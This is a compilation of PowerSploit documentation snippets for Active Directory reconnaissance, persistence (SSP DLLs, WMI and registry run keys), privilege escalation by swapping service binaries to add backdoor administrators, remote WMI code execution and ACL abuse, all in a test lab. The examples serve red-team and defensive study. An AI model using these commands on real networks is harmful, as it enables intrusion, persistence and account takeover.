### Get Shares for All Domain Computers Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetShare.md This example demonstrates retrieving shares from all computers within the current domain by piping the output of Get-DomainComputer to Get-NetShare. ```powershell Get-DomainComputer | Get-NetShare ``` -------------------------------- ### Get Logged On Users with Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetLoggedon.md Use this example to connect to a remote host using specified credentials. Ensure the password is kept secure. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-NetLoggedon -ComputerName sqlserver -Credential $Cred ``` -------------------------------- ### Example 1: Basic Usage Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainTrustMapping.md This example demonstrates the basic usage of the Get-DomainTrustMapping cmdlet. Add example code here. ```powershell PS C:\> {{ Add example code here }} ``` -------------------------------- ### Install SSP DLL Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/Install-SSP.md Use this command to install an SSP DLL. Ensure the DLL architecture matches the OS architecture and that it exports the SpLsaModeInitialize function. ```powershell Install-SSP -Path .\mimilib.dll ``` -------------------------------- ### Get foreign users with alternate credentials and server binding Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainForeignUser.md This example demonstrates how to query foreign users in 'dev.testlab.local' while binding to a specific domain controller ('secondary.dev.testlab.local') and using alternate credentials. The credentials must be created using a secure string for the password. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred ``` -------------------------------- ### Get Forest Global Catalogs with Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-ForestGlobalCatalog.md This example demonstrates how to query for global catalog servers using alternate credentials. It first securely converts a plain text password to a secure string and then creates a PSCredential object before calling the cmdlet. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-ForestGlobalCatalog -Credential $Cred ``` -------------------------------- ### Get users by multiple identities and specific properties Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainUser.md This example demonstrates retrieving users by a mix of SIDs, distinguished names, GUIDs, and usernames. It also specifies that only 'samaccountname' and 'lastlogoff' properties should be returned. ```powershell 'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff ``` -------------------------------- ### Invoke-RevertToSelf Example Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Invoke-RevertToSelf.md This example demonstrates how to use Invoke-RevertToSelf after impersonating a user with Invoke-UserImpersonation. It first converts a plain text password to a secure string, creates a PSCredential object, impersonates the user to get a token, and then reverts the impersonation, closing the token handle. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) $Token = Invoke-UserImpersonation -Credential $Cred Invoke-RevertToSelf -TokenHandle $Token ``` -------------------------------- ### Get Domain Policy with Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainPolicy.md This example demonstrates how to use alternate credentials to retrieve the domain policy. First, a secure string password is created, then a PSCredential object is instantiated, and finally, Get-DomainPolicy is called with the -Credential parameter. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainPolicy -Credential $Cred ``` -------------------------------- ### Get Domain Controllers via Pipeline Input Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainController.md This example demonstrates how to pipe a domain name directly to the Get-DomainController cmdlet to determine its domain controllers. ```powershell 'test.local' | Get-DomainController ``` -------------------------------- ### Get Domains Using Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-ForestDomain.md This example demonstrates how to query a forest using alternate credentials. It first converts a plain text password to a secure string and then creates a PSCredential object before calling Get-ForestDomain. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-ForestDomain -Credential $Cred ``` -------------------------------- ### Install and Import PowerSploit Module Source: https://context7.com/powershellmafia/powersploit/llms.txt Instructions for installing PowerSploit as a PowerShell module and importing its commands. Includes unblocking scripts and viewing help. ```powershell # Copy to per-user module directory Copy-Item -Recurse .\PowerSploit "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules\PowerSploit" # Import the full module Import-Module PowerSploit # List all imported commands Get-Command -Module PowerSploit # Unblock scripts downloaded from the internet (PowerShell v3+) $Env:PSModulePath.Split(';') | ForEach-Object { if (Test-Path (Join-Path $_ PowerSploit)) { Get-ChildItem $_ -Recurse | Unblock-File } } # View help for any function Get-Help Get-DomainUser -Full ``` -------------------------------- ### Get Domain Computers with Custom Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainComputer.md Retrieves computer objects using custom credentials. This example first creates a secure string for the password and then a PSCredential object. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainComputer -Credential $Cred ``` -------------------------------- ### Find-AVSignature - Basic Usage Source: https://github.com/powershellmafia/powersploit/blob/master/docs/AntivirusBypass/Find-AVSignature.md This example demonstrates the basic usage of Find-AVSignature to locate AV signatures within a file. It specifies the start byte, end byte, interval, and the path to the target executable. ```powershell Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe ``` -------------------------------- ### Return All Objects for a Specific Domain Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md This example demonstrates how to retrieve all objects from the 'testlab.local' domain. ```powershell Get-DomainObject -Domain testlab.local ``` -------------------------------- ### Enumerate ACLs for All OUs Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObjectAcl.md This example demonstrates how to pipe the output of Get-DomainOU into Get-DomainObjectAcl to enumerate ACL permissions for all Organizational Units within the domain. The -ResolveGUIDs switch is used to display GUIDs as names. ```powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs ``` -------------------------------- ### Find Unattended Install Files Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Get-UnattendedInstallFile.md Execute this command to search for any remaining unattended installation files on the system. ```powershell Get-UnattendedInstallFile ``` -------------------------------- ### Get All Security Groups with Managers and Export to CSV Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainManagedSecurityGroup.md This example retrieves all security groups that have a manager assigned and exports the results to a CSV file named 'group-managers.csv'. Ensure the Export-PowerViewCSV cmdlet is available. ```powershell Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv ``` -------------------------------- ### Add-DomainObjectAcl Example Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Add-DomainObjectAcl.md This example demonstrates how to grant the 'ResetPassword' right to the 'harmj0y' principal on the 'testuser' object using alternate credentials. ```APIDOC ## Add-DomainObjectAcl ### Description Grants specified rights to a principal on a domain object. ### Method Add-DomainObjectAcl ### Parameters #### -TargetIdentity A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) for the domain object to modify ACLs for. Required. Wildcards accepted. - **param** (String[]) - Required - A SamAccountName, DistinguishedName, SID, or GUID for the domain object. #### -TargetDomain Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. - **param** (String) - Optional - The domain for the TargetIdentity. #### -TargetLDAPFilter Specifies an LDAP query string that is used to filter Active Directory object targets. - **param** (String) - Optional - An LDAP query string. #### -TargetSearchBase The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - **param** (String) - Optional - The LDAP source to search through. #### -PrincipalIdentity A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) for the domain principal to add for the ACL. Required. Wildcards accepted. - **param** (String[]) - Required - A SamAccountName, DistinguishedName, SID, or GUID for the principal. #### -PrincipalDomain Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. - **param** (String) - Optional - The domain for the principal. #### -Rights Specifies the rights to grant to the principal on the target object. Common rights include 'ReadPassword', 'ResetPassword', 'GenericAll', etc. - **param** (String[]) - Required - The rights to grant. #### -Credential Specifies credentials to use when connecting to the domain controller. - **param** (PSCredential) - Optional - Credentials for authentication. ### Request Example ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose ``` ### Response #### Success Response (200) This cmdlet typically does not return a value on success, but provides verbose output indicating the ACL modification. #### Response Example ``` VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local ``` ``` -------------------------------- ### Get Computer Information as Objects Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-ComputerDetail.md Use this command to retrieve detailed computer information and have it output as PowerShell objects for further manipulation. ```powershell Get-ComputerDetail ``` -------------------------------- ### Install-ServiceBinary - Pipe Service Object for Binary Replacement Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md This example demonstrates piping a service object to Install-ServiceBinary to replace its binary. It defaults to adding a local administrator. ```powershell Get-Service VulnSVC | Install-ServiceBinary ``` -------------------------------- ### Get GPOs by Identity (GUID or Name) Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPO.md Retrieves GPOs based on their GUID or display name. This allows for targeted retrieval of specific policy objects. ```powershell " {F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO ``` -------------------------------- ### Get Sites Linked to a Specific GPO Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainSite.md Returns all sites that are linked to the specified Group Policy Object GUID. ```powershell Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" ``` -------------------------------- ### Invoke-ReverseDnsLookup with Piped Input Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Invoke-ReverseDnsLookup.md This example demonstrates how to pipe a string containing IP addresses and CIDR ranges to Invoke-ReverseDnsLookup for processing. ```powershell Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup ``` -------------------------------- ### Get Domain Group Members Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGroupMember.md Retrieves members of the 'Desktop Admins' group in the current domain. This is a basic usage example. ```powershell Get-DomainGroupMember "Desktop Admins" ``` -------------------------------- ### PermanentWMIAtStartup Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/New-ElevatedPersistenceOption.md Configures persistence using a permanent WMI event subscription that triggers at system startup. This method is considered difficult to detect and remove. ```APIDOC ## New-ElevatedPersistenceOption -PermanentWMI -AtStartup ### Description Configures persistence via a permanent WMI event subscription that triggers at system startup. This option is difficult to detect and remove. ### Method PowerShell Cmdlet ### Parameters #### Switch Parameters - **-PermanentWMI**: Persist via a permanent WMI event subscription. - **-AtStartup**: Starts the payload within 240 and 325 seconds of computer startup. ### Example ```powershell $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -AtStartup ``` ``` -------------------------------- ### Get ACLs for a Local File via Pipeline Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-PathAcl.md This example demonstrates piping a file object obtained from Get-ChildItem to Get-PathAcl to retrieve its ACLs. ```powershell gci .\test.txt | Get-PathAcl ``` -------------------------------- ### Find Interesting Domain ACLs with Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Find-InterestingDomainAcl.md Demonstrates how to use custom credentials to run Find-InterestingDomainAcl against a domain, including resolving GUIDs. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs ``` -------------------------------- ### Get RDP Sessions on Domain Controllers Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetRDPSession.md This example retrieves active RDP/terminal sessions on all domain controllers by piping the output of Get-DomainController to Get-NetRDPSession. ```powershell Get-DomainController | Get-NetRDPSession ``` -------------------------------- ### Install-ServiceBinary - Execute Custom Command Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md Replace a service's binary with one that executes a specified custom command instead of creating a user. The original binary is backed up. ```powershell Install-ServiceBinary -Name VulnSVC -Command "net ..." ``` -------------------------------- ### Convert SID with alternate credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/ConvertFrom-SID.md This example shows how to convert a SID using alternate credentials. A secure string for the password is created, then a PSCredential object is instantiated, which is then passed to the ConvertFrom-SID cmdlet. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred ``` -------------------------------- ### New-UserPersistenceOption - Registry - AtLogon Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/New-UserPersistenceOption.md Configures persistence via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, executing upon user logon. ```APIDOC ## New-UserPersistenceOption - Registry - AtLogon ### Description Configures persistence via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, executing upon user logon. Note: This option will briefly pop up a PowerShell console to the user. ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Request Example ```powershell New-UserPersistenceOption -Registry -AtLogon ``` ### Response #### Success Response (200) Returns an object representing the configured persistence option. #### Response Example ```json { "PersistenceOption": "Registry", "AtLogon": true } ``` ``` -------------------------------- ### Get GPO-Set Local Groups by GPO Identity Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPOLocalGroup.md Retrieves GPO-set groups for a specific GPO identified by its GUID. The GPO identity can be piped to the cmdlet. ```powershell '{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup ``` -------------------------------- ### Get-WMIRegProxy Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-WMIRegProxy.md Enumerates proxy and WPAD settings for the current user on the local machine. ```APIDOC ## Get-WMIRegProxy ### Description Enumerates the proxy server and WPAD specification for the current user on the local machine. ### Method GET (conceptual, as this is a PowerShell cmdlet) ### Endpoint Not applicable (PowerShell cmdlet) ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Request Example ```powershell Get-WMIRegProxy ``` ### Response #### Success Response Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. #### Response Example ```json [ { "ComputerName": "WINDOWS1", "ProxyServer": "http://primary.test...", "AutoConfigURL": null, "Wpad": null } ] ``` ``` -------------------------------- ### Get MS SQL Servers in a Specific Domain Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainComputer.md Retrieves computer objects that have a service principal name starting with 'mssql*' within the 'testlab.local' domain. ```powershell Get-DomainComputer -SPN mssql* -Domain testlab.local ``` -------------------------------- ### Get GPOs with Custom LDAP Filter Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPO.md Uses a custom LDAP filter to retrieve GPOs. This example retrieves GPOs that are not the primary group for domain controllers. ```powershell Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon ``` -------------------------------- ### Get-NetComputerSiteName - With Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetComputerSiteName.md This example demonstrates how to use alternate credentials to retrieve the AD site for a remote computer. Ensure the credentials are valid and have the necessary permissions. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred ``` -------------------------------- ### Install-ServiceBinary - Replace Service Binary with Default Administrator Creation Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md Use this cmdlet to replace a service's binary with one that adds a default local administrator user. The original binary is backed up. ```powershell Install-ServiceBinary -Name VulnSVC ``` -------------------------------- ### Get GPO-Set Local Groups with Custom Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPOLocalGroup.md Retrieves GPO-set local groups using specified credentials. This example first creates a secure string for the password and then a PSCredential object. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainGPOLocalGroup -Credential $Cred ``` -------------------------------- ### Restore Service Binary via Pipeline Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Restore-ServiceBinary.md This example demonstrates piping a service object to Restore-ServiceBinary to restore its original binary. This is useful when you already have the service object. ```powershell Get-Service VulnSVC | Restore-ServiceBinary ``` -------------------------------- ### Authenticate with Custom Credentials and Retrieve Object Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md This example demonstrates how to authenticate to Active Directory using custom credentials and then retrieve a specific domain object by its identity. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainObject -Credential $Cred -Identity 'windows1' ``` -------------------------------- ### Execute a simple ScriptBlock on a remote host Source: https://github.com/powershellmafia/powersploit/blob/master/docs/CodeExecution/Invoke-WmiCommand.md This example demonstrates executing a basic ScriptBlock on a remote computer using specified credentials. Ensure the provided credentials have the necessary permissions on the target machine. ```powershell Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1' ``` -------------------------------- ### Retrieve Specific Properties for Piped Identities Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md This example shows how to retrieve the 'distinguishedname' property for a list of identities provided via the pipeline. The identities can be in various formats like SID, DistinguishedName, GUID, or SamAccountName. ```powershell 'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname ``` -------------------------------- ### Test Admin Access with Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Test-AdminAccess.md This example demonstrates how to test admin access on a remote machine using alternate credentials. Ensure the password is kept secure. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Test-AdminAccess -ComputerName sqlserver -Credential $Cred ``` -------------------------------- ### Get ACLs for a Specific User Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObjectAcl.md Use this snippet to retrieve ACLs for a user by their SAM account name in a specified domain. The -ResolveGUIDs parameter ensures that relevant GUIDs are translated into human-readable display names. ```powershell Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs ``` -------------------------------- ### Execute Get-DomainGPOUserLocalGroupMapping with Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md This example demonstrates how to execute the Get-DomainGPOUserLocalGroupMapping function using specific credentials. It first converts a plain text password to a secure string and then creates a PSCredential object for authentication. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainGPOUserLocalGroupMapping -Credential $Cred ``` -------------------------------- ### Install-ServiceBinary - Specify User and Password for Local Group Addition Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md Replace a service's binary and specify both a custom username and password for the new local administrator account. The user will be added to the default 'Administrators' group. ```powershell Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! ``` -------------------------------- ### Configure Registry Persistence at Startup Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Persistence/New-ElevatedPersistenceOption.md Use this to configure persistence via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, triggering at user logon. Note that this option will briefly display a PowerShell console. ```powershell New-ElevatedPersistenceOption -Registry -AtStartup ``` -------------------------------- ### Set Service Binary Path by Name Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Set-ServiceBinaryPath.md This example demonstrates how to set the binary path for a service named 'VulnSvc' to execute a command that adds a user. This requires the service name and the desired command as the new path. ```powershell Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add' ``` -------------------------------- ### Get Domain Group from a Different Domain using Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGroup.md Retrieves the 'Domain Admins' group from a different domain ('DEV') using verbose output to show the search process. This example illustrates querying groups across trusted domains or different forest structures. ```powershell 'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname ``` -------------------------------- ### Get-WMIRegProxy with Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-WMIRegProxy.md Enumerates proxy and WPAD settings for the current user on a remote machine using alternate credentials. ```APIDOC ## Get-WMIRegProxy - Credential and ComputerName ### Description Enumerates the proxy server and WPAD specification for the current user on a remote machine specified with -ComputerName, using alternate credentials. ### Method GET (conceptual, as this is a PowerShell cmdlet) ### Endpoint Not applicable (PowerShell cmdlet) ### Parameters #### Path Parameters None #### Query Parameters None #### Request Body None ### Parameters #### -ComputerName Specifies the system to enumerate proxy settings on. Defaults to the local host. #### -Credential A [Management.Automation.PSCredential] object of alternate credentials for connecting to the remote system. ### Request Example ```powershell $Cred = Get-Credential "TESTLAB\administrator" Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local ``` ### Response #### Success Response Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. #### Response Example ```json [ { "ComputerName": "windows1.testlab.local", "ProxyServer": "primary.testlab.local", "AutoConfigURL": null, "Wpad": null } ] ``` ``` -------------------------------- ### Get User SID and then Add Domain Object ACL Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Add-DomainObjectAcl.md This example first retrieves the Security Identifier (SID) for a specified user and then uses it to filter the ACLs of a target object. Finally, it adds a 'ResetPassword' right to the target object for the specified principal. Use -Verbose to see the granting process. ```powershell $Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} ``` ```powershell Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose ``` ```powershell Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } ``` -------------------------------- ### Add Dacls for every service the current user can read Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Add-ServiceDacl.md This example demonstrates how to add DACLs to all services that the current user has read permissions for. It pipes the output of Get-Service to Add-ServiceDacl. ```powershell Get-Service | Add-ServiceDacl ``` -------------------------------- ### Retrieve Objects Based on Domain and Identity with Verbose Output Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainObject.md This example retrieves objects for specific identities within the current domain, displaying verbose output to show the search strings and filters used. It also demonstrates extracting the domain name from the current environment. ```powershell Get-Domain | Select-Object -Expand name 'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname ``` -------------------------------- ### Get-DomainOU with custom credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainOU.md This example demonstrates how to use custom credentials to query Active Directory. It first converts a plain text password to a secure string and then creates a PSCredential object before calling Get-DomainOU. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainOU -Credential $Cred ``` -------------------------------- ### Check HTTP Status Codes with SSL Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-HttpStatus.md This example demonstrates how to use Get-HttpStatus with an SSL connection to check for a specified path on a target web host. ```powershell Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL ``` -------------------------------- ### Get Domain Trust (NET Default) Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainTrust.md Retrieves domain trust information using the default NET method. This is the simplest way to get trust data. ```powershell Get-DomainTrust ``` -------------------------------- ### Install-ServiceBinary - Specify User for Local Group Addition Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Install-ServiceBinary.md Replace a service's binary and specify a custom username to be added to the local Administrators group. The default password 'Password123!' will be used. ```powershell Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' ``` -------------------------------- ### Find Interesting Domain ACLs with Domain and GUID Resolution Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Find-InterestingDomainAcl.md Searches for interesting object ACLs in a specified domain ('dev.testlab.local') and resolves GUIDs to their corresponding display names. ```powershell Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs ``` -------------------------------- ### Find Subnets Linked to a Specific Group Policy Object Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainSubnet.md Returns subnet objects that are linked to the specified group policy object GUID. The GPLink parameter accepts the GUID of the GPO. ```powershell Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" ``` -------------------------------- ### Set Service Binary Path via Pipeline Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Set-ServiceBinaryPath.md This example shows how to pipe a service object (obtained via Get-Service) to Set-ServiceBinaryPath to change its binary path. This is an alternative method to specifying the service by name directly. ```powershell Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add' ``` -------------------------------- ### Install PowerSploit Module Source: https://github.com/powershellmafia/powersploit/blob/master/README.md To install the PowerSploit module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. ```powershell $Env:PSModulePath.Split(';') | ForEach-Object { if ( Test-Path (Join-Path $_ "PowerSploit") ) { Get-ChildItem $_ -Recurse | Unblock-File } } ``` -------------------------------- ### Get Domain Controllers with Alternate Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainController.md This snippet shows how to set up alternate credentials and then use them with Get-DomainController to query domain controllers in a different domain or with different permissions. Ensure the password is kept secure. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainController -Credential $Cred ``` -------------------------------- ### Execute a ScriptBlock with custom registry locations Source: https://github.com/powershellmafia/powersploit/blob/master/docs/CodeExecution/Invoke-WmiCommand.md This example demonstrates executing a simple arithmetic ScriptBlock on a remote host, specifying custom registry locations for storing the payload and its results. It also uses a specific administrator credential and enables verbose output. ```powershell Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential '10.10.1.1\Administrator' -Verbose ``` -------------------------------- ### Find OUs linked to a specific Group Policy Object Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainOU.md This command retrieves OUs that are linked to a Group Policy Object identified by its GUID. The -GPLink parameter accepts the GPO's GUID. ```powershell Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" ``` -------------------------------- ### Write User Add MSI Installer Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Privesc/Write-UserAddMSI.md Generates the UserAdd.msi file in the current directory. This MSI can be used to add a user or group to the system, potentially for privilege escalation. ```powershell Write-UserAddMSI ``` -------------------------------- ### Get Local Sessions Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetSession.md Use this snippet to retrieve active sessions on the local machine. ```powershell Get-NetSession ``` -------------------------------- ### Get Domain SID Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainSID.md Retrieves the SID for the current domain. No additional parameters are required. ```powershell 